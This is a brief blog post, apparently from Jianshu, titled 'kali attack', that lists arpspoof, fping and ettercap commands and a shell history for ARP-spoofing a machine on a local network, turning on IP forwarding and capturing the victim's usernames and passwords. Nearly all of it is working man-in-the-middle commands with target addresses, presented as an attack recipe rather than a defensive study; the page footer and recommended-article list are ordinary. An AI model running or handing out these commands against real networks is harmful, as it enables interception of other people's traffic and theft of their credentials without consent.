kali attack(2016-09-02)

arp attack

  • synopsis

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.0.102 192.168.0.1 //arp attack
fping -asg 192.198.0.1/24 //inquire the ip addr on lan( local are network)
fping -g 192.168.0.1/24
echo 1 > /proc/sys/net/ipv4/ip_forward//ip data packets redirect


ettercap

  • synopsis: If IPv6 is enabled:
    TARGET is in the form MAC/IPs/IPv6/PORTs
    Otherwise,
    TARGET is in the form MAC/IPs/PORTs
    where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)

ettercap -Tq -i eth0 //when arp attack succeeds, we can use ettercap to acquire the datas of the host ,such as password ,ip ,username etc.

---

ifconfig
fping -g 192.168.0.1/24
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.103
cd /proc/sys/net/ipv4
cat ip_forward
138 echo 1 > ip_forward
139 cat ip_forward
ettercap -Tq -i wlan0

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 本文整理了在实践过程中使用的Linux网络工具,这些工具提供的功能非常强大,我们平时使用的只是冰山一角,比如lso...
    老夫刘某阅读 3,626评论 0 7
  • NAME dnsmasq - A lightweight DHCP and caching DNS server....
    ximitc阅读 2,938评论 0 0
  • 第九章 无线攻击 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:C...
    布客飞龙阅读 5,129评论 1 99
  • 在我需要你的时候 我仍旧独处无尽的空虚 空虚沸腾着雾气般的忧愁 就像站在大河边上 目送你向东流去不能紧紧相随 多想...
    苏shi阅读 409评论 6 11
  • 我好像喜欢上了一个人
    洛小乙阅读 127评论 0 0